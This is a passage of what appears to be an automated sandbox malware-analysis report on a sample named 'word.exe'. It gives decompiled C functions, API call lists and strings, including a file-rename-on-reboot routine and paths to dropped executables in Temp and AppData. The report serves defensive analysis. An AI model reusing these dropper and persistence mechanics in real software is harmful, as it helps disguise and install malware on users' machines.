									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404F7F(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42372c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x423740;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42372c = 0;
								 *0x423740 = 0;
								 *0x42a2c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404FFF();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x423740;
									_t201 =  *0x42a288;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42a28c <= 0) {
										L86:
										if( *0x42a31e == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x42a28c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x423740);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x42a2c0 = _t291;
					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
					 *0x423734 =  *0x423734 | 0xffffffff;
					_t297 = _t258;
					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42372c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004045C4(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004045C4(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x42a28c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x423740 + _t300 * 4) = _t284;
									_v16 =  *( *0x423740 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x42a28c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004045F9(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004045F9(_v12);
								L93:
								return E0040462B(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00405038
0x00405051
0x00405056
0x0040505e
0x00405064
0x0040507a
0x0040507d
0x004052a8
0x004052af
0x004052c3
0x004052b1
0x004052b3
0x004052b6
0x004052b7
0x004052be
0x004052be
0x004052cf
0x004052dd
0x004052e0
0x004052f6
0x0040536b
0x0040536e
0x00405370
0x0040537a
0x00405388
0x00405388
0x0040538a
0x00405394
0x0040539a
0x0040539d
0x004053a0
0x004053bb
0x004053a2
0x004053ac
0x004053ac
0x004053a0
0x00405394
0x00000000
0x0040536e
0x004052fb
0x00405306
0x0040530b
0x00405312
0x00405317
0x0040531b
0x00405326
0x00405326
0x0040532a
0x0040532e
0x00405332
0x00405345
0x00405334
0x00405334
0x0040533b
0x00405341
0x0040533d
0x0040533d
0x0040533d
0x0040533b
0x00405349
0x0040534b
0x0040535e
0x00405361
0x00405364
0x00405364
0x0040532e
0x00000000
0x0040531b
0x004052fd
0x00405304
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004053be
0x004053be
0x004053c5
0x00405436
0x0040543e
0x00405446
0x00405446
0x0040544f
0x00405451
0x00405458
0x0040545b
0x0040545b
0x00405461
0x00405468
0x0040546b
0x0040546b
0x00405471
0x00405477
0x0040547d
0x0040547d
0x0040548a
0x004055eb
0x004055f2
0x0040560f
0x00405615
0x00405627
0x00405627
0x00000000
0x00405490
0x00405492
0x00405497
0x0040549c
0x004054a1
0x004054a3
0x004054a3
0x004054a4
0x004054a5
0x004054a7
0x004054a7
0x004054af
0x004054f0
0x004054f2
0x00405502
0x00405505
0x0040550a
0x00405511
0x00405514
0x004055b6
0x004055bf
0x004055c7
0x004055c7
0x004055d5
0x004055e6
0x004055e6
0x00000000
0x004055d5
0x0040551a
0x0040551d
0x00405523
0x00405528
0x0040552a
0x0040552c
0x00405532
0x00405539
0x0040553e
0x00405545
0x00405548
0x00405548
0x0040554f
0x0040555b
0x0040555f
0x00405561
0x00405561
0x00405551
0x00405553
0x00405553
0x00405581
0x0040558d
0x0040559c
0x0040559c
0x0040559e
0x004055a1
0x004055aa
0x00000000
0x004054b1
0x004054bc
0x004054bf
0x004054c4
0x004054c6
0x004054ca
0x004054da
0x004054e4
0x004054e6
0x004054e9
0x00000000
0x00000000
0x00000000
0x00000000
0x004054cc
0x004054cc
0x004054d2
0x004054d4
0x004054d4
0x004054d5
0x004054d6
0x00000000
0x004054cc
0x004054af
0x0040548a
0x004053cd
0x00000000
0x004053e3
0x004053ed
0x004053f2
0x00000000
0x00000000
0x00405404
0x00405409
0x00405415
0x00405415
0x00405417
0x00405426
0x00405428
0x0040542c
0x0040542f
0x00000000
0x0040542f
0x004053cd
0x00405083
0x00405088
0x00405091
0x00405098
0x004050aa
0x004050b5
0x004050bb
0x004050c9
0x004050dd
0x004050e2
0x004050ef
0x004050f4
0x0040510a
0x0040511b
0x00405128
0x00405128
0x0040512b
0x00405131
0x00405133
0x00405136
0x0040513b
0x00405140
0x00405142
0x00405142
0x00405162
0x00405162
0x00405164
0x00405165
0x0040516a
0x00405170
0x00405174
0x00405179
0x00405181
0x00405185
0x0040518a
0x0040518f
0x00405197
0x0040519a
0x0040526a
0x0040527d
0x00000000
0x004051a0
0x004051a3
0x004051a6
0x004051a9
0x004051a9
0x004051af
0x004051b8
0x004051bb
0x004051bf
0x004051c2
0x004051c5
0x004051ce
0x004051d7
0x004051da
0x004051dd
0x004051e0
0x0040521e
0x00405249
0x00405220
0x0040522f
0x0040522f
0x004051e2
0x004051e5
0x004051f3
0x004051fd
0x00405205
0x0040520c
0x00405217
0x00405217
0x004051e0
0x0040524f
0x00405250
0x0040525c
0x0040525c
0x00405268
0x00405283
0x00405286
0x004052a3
0x00000000
0x00405288
0x0040528d
0x00405296
0x00405629
0x0040563b
0x0040563b
0x00405286
0x00000000
0x00405268
0x0040519a

APIs

GetDlgItem.USER32(?,000003F9), ref: 00405049
GetDlgItem.USER32(?,00000408), ref: 00405054
GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
LoadImageW.USER32 ref: 004050B5
SetWindowLongW.USER32 ref: 004050CE
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
DeleteObject.GDI32(00000000), ref: 0040512B
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D

Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
GetWindowLongW.USER32(?,000000F0), ref: 0040526F
SetWindowLongW.USER32 ref: 0040527D
ShowWindow.USER32(?,00000005), ref: 0040528D
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
ImageList_Destroy.COMCTL32(?), ref: 0040545B
GlobalFree.KERNEL32(?), ref: 0040546B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
ShowWindow.USER32(?,00000000), ref: 00405615
GetDlgItem.USER32(?,000003FE), ref: 00405620
ShowWindow.USER32(00000000), ref: 00405627

Strings

M, xrefs: 004051E5
N, xrefs: 004052C6
, xrefs: 004055FF

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18

Uniqueness

Uniqueness Score: -1.00%

Function 00404783 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x421714 =  *0x421714 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040462B(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x428200;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404A32(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a268, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a268, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
						goto L27;
					} else {
						_t116 =  *0x422720 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404A0E();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x42923c - 4 + _t75 * 4);
				}
				_t76 =  *0x42a298 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404734;
				if(_t110 != 2) {
					_v8 = E004046FA;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004045C4(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004045C4(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004045F9(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a270 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x421714 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x421714 = 0;
				return 0;
			}

0x00404795
0x004048c2
0x0040491f
0x00404923
0x004049f0
0x004049f2
0x004049f2
0x004049f8
0x004049f8
0x004049fb
0x00000000
0x00404a02
0x00404931
0x00404937
0x00404941
0x0040494c
0x0040494f
0x00404952
0x0040495d
0x00404960
0x00404967
0x00404974
0x00404985
0x0040498b
0x00404993
0x004049a1
0x004049a7
0x004049a7
0x00404967
0x004049b1
0x00000000
0x004049bc
0x004049c0
0x004049d0
0x004049d0
0x004049d6
0x004049e2
0x004049e2
0x00000000
0x004049e6
0x004049b1
0x004048cd
0x00000000
0x004048df
0x004048e4
0x004048ea
0x00000000
0x00000000
0x00404913
0x00404915
0x0040491a
0x00000000
0x0040491a
0x004048cd
0x0040479b
0x0040479e
0x004047a3
0x004047b4
0x004047b4
0x004047bc
0x004047bf
0x004047c3
0x004047c6
0x004047ca
0x004047cd
0x004047d0
0x004047d3
0x004047da
0x004047dc
0x004047dc
0x004047e6
0x004047f3
0x004047fd
0x00404802
0x00404805
0x0040480a
0x00404821
0x00404828
0x0040483b
0x0040483e
0x00404852
0x00404859
0x0040485e
0x00404863
0x00404863
0x00404871
0x0040487f
0x00404891
0x00404896
0x004048a6
0x004048a8
0x00000000

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404821
GetDlgItem.USER32(?,000003E8), ref: 00404835
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
GetSysColor.USER32 ref: 00404863
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
lstrlenW.KERNEL32(?), ref: 00404884
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
GetDlgItem.USER32(?,0000040A), ref: 004048FF
SendMessageW.USER32(00000000), ref: 00404906
GetDlgItem.USER32(?,000003E8), ref: 00404931
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
LoadCursorW.USER32 ref: 00404982
SetCursor.USER32(00000000), ref: 00404985
LoadCursorW.USER32 ref: 0040499E
SetCursor.USER32(00000000), ref: 004049A1
SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2

Strings

N, xrefs: 0040491F
"C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\AppData\Local\Temp\pofhrbobst.v, xrefs: 00404960

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: "C:\Users\user\AppData\Local\Temp\gnwnekc.exe" C:\Users\user\AppData\Local\Temp\pofhrbobst.v$N
API String ID: 3103080414-765680901
Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004062AE Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004062AE(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426de8 = 0x55004e;
				 *0x426dec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x4275e8
					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
						_t53 = _t52 + 0x10;
						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00406113(_t24 + _t46, 0x4269e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E0040620A(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00406158(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x004062ae
0x004062b7
0x004062be
0x004062c8
0x004062dc
0x00406304
0x0040630b
0x0040630f
0x00406313
0x00406333
0x0040633a
0x00406344
0x00406351
0x00406356
0x0040635b
0x0040635f
0x0040636e
0x00406370
0x0040637d
0x00406381
0x0040641c
0x00000000
0x00406397
0x004063a4
0x004063c8
0x004063cc
0x004063eb
0x004063ef
0x004063ef
0x004063f1
0x004063fa
0x00406405
0x00406410
0x00406416
0x00000000
0x00406416
0x004063ce
0x004063d1
0x004063dc
0x004063d8
0x004063da
0x004063db
0x004063db
0x004063e3
0x004063e5
0x00000000
0x004063e5
0x004063af
0x004063b5
0x00000000
0x004063b5
0x00406381
0x0040635f
0x004062de
0x004062e9
0x004062f2
0x004062f6
0x00000000
0x00000000
0x004062f6
0x00406427

APIs

CloseHandle.KERNEL32(00000000), ref: 004062E9
GetShortPathNameW.KERNEL32 ref: 004062F2

Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF

GetShortPathNameW.KERNEL32 ref: 0040630F
wsprintfA.USER32 ref: 0040632D
GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
GlobalFree.KERNEL32(00000000), ref: 00406416
CloseHandle.KERNEL32(00000000), ref: 0040641D

Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 0040615C
Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E

Strings

uB, xrefs: 0040630B
%ls=%ls, xrefs: 00406323
uB, xrefs: 00406304
mB, xrefs: 004062D7
[Rename], xrefs: 00406397, 004063A9

Memory Dump Source

Source File: 00000005.00000002.921283190.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.921277923.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921291150.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921295812.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921316277.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921324458.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921331757.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.921337958.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_word.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]$mB$uB$uB
API String ID: 2171350718-2295842750
Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
